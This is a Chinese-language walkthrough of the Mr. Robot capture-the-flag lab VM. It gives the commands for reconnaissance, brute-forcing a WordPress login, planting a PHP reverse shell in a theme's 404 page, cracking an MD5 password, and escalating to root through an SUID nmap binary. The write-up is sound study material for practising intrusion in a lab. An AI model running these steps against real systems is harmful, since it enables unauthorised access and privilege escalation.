信息收集:
1.信息收集三部曲:扫描ip+端口扫描+目录扫描:
arp -a
nmap 192.168.225.171 -p 1-65535
python dirsearch.py -u http://192.168.225.171 -e * -i 200
这目录扫出来明显是wordpress的建站平台。
2.访问网页,页面是这样的:
3.访问robots.txt获取到一个字典和第一个key,字典到时候肯定会用来爆破密码的。
4.获取第一个key-1:
curl http://192.168.225.171/key-1-of-3.txt
5.访问扫描出的登录地址:http://192.168.225.171/wp-login,账户密码用刚刚找到的字典爆破一下,进入lost your password页面,进行抓包发送到测试器:
6.清除所有payload,然后设置user_login为payload,导入字典进行爆破:
7. 爆破出来用户名为:elliot,有大小写的问题
返回登录界面,逐个尝试,并在此页面抓包,导入相同的字典,进行密码爆破:
得到账号:elloit,密码:ER28-0652,用该账号进行后台登录
反弹shell:
1.来到后台,发现editor里面可以写入内容,此时用kali自带的反向shell进行写入,需要修改为攻击机的ip:
cd /usr/share/webshells/php
cp php-reverse-shell.php /home //拷贝到home目录方便图形化界面打开看
2.现在在kali上进行监听,点击upload file,此时访问404页面:192.168.225.171/404.php即可成功反弹shell:
3.在/home/robot目录下发现第二个key与一个密码文件,key-2没有权限,此时将密码文件进行md5解密:
密码:abcdefghijklmnopqrstuvwxyz
4.进行su登录:
python -c "import pty;pty.spawn('/bin/bash')"
su robot
cat /home/robot/key-2-of-3.txt
nmap提权:
1.一般权限都是比较低的,所以需要提权,首先尝试suid提权:
find / -user root -perm -4000 -print 2>/dev/null
2.发现可以使用nmap提权,根目录下发现第三个key-3:
nmap --interactive
!sh